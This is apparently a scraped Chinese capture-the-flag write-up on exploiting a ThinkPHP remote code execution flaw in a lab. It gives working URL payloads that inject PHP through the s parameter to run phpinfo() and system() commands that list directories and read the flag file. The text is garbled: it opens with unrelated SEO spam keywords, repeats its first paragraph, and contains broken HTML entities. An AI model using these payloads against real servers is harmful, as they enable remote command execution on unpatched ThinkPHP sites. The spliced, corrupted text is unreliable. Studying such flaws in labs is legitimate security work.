上线了 做商务网站,那个手机网最好,韩国最牛的设计网站,中铁门户网登录打开靶场是这个有些简陋的界面。 随便点点#xff0c;找到这个东西。 看到ThinkPHP#xff0c;思路瞬间清晰#xff0c;老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc。
/index.php/?sIndex/\think\View/displaycontent%22%3C?%3E%3C?php%20phpinfo();…
打开靶场是这个有些简陋的界面。 随便点点找到这个东西。 看到ThinkPHP思路瞬间清晰老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc。
/index.php/?sIndex/\think\View/displaycontent%22%3C?%3E%3C?php%20phpinfo();?%3Edata1
成功打开phpinfo界面。 查看目录
/index.php/?sIndex/\think\View/displaycontent??php%20system(%27ls%20/../%27);?data1 找到flag了抓取。
/index.php/?sIndex/\think\View/displaycontent??php%20system(%27cat%20/../flag%27);?data1 防止有些新朋友不明白POC怎么来的简短介绍一下。
这poc的意思是在URL中发送了一个参数 s。Index/\think\View/display在ThinkPHP框架中这会被解释为对视图进行显示的操作。content是包含php代码的字符串其中是执行的恶意代码。